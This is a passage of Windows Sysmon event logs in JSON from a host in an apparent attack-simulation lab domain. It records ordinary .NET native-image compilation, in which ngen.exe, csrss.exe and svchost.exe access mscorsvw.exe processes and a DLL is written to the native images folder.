05:59:06.387","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010B7560E00}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7405,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:06.387\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010B7560E00}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:06.387","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010B7560E00}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7406,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:06.403\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04AA-5F25-0000-00101C141000}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:06.403","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04AA-5F25-0000-00101C141000}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7407,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:16.996\r\nProcessGuid: {A837DB8D-04AA-5F25-0000-00101C141000}\r\nProcessId: 2520\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9d8-0\\System.Data.Entity.dll\r\nCreationUtcTime: 2020-08-01 05:59:16.996","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:16.996","ProcessGuid":"{A837DB8D-04AA-5F25-0000-00101C141000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9d8-0\\System.Data.Entity.dll","CreationUtcTime":"2020-08-01 05:59:16.996","EventReceivedTime":"2020-08-01 05:59:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7408,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:17.262\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001047640E00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:17.262","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001047640E00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7409,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:17.262\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001047640E00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:17.262","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001047640E00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7410,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:17.278\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04B5-5F25-0000-0010C61B1000}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:17.278","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04B5-5F25-0000-0010C61B1000}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7411,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:17.481\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04B5-5F25-0000-0010E51F1000}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:17.481","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04B5-5F25-0000-0010E51F1000}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7412,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:17.481\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04B5-5F25-0000-0010E51F1000}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:17.481","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04B5-5F25-0000-0010E51F1000}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7413,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:17.481\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04B5-5F25-0000-0010E51F1000}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 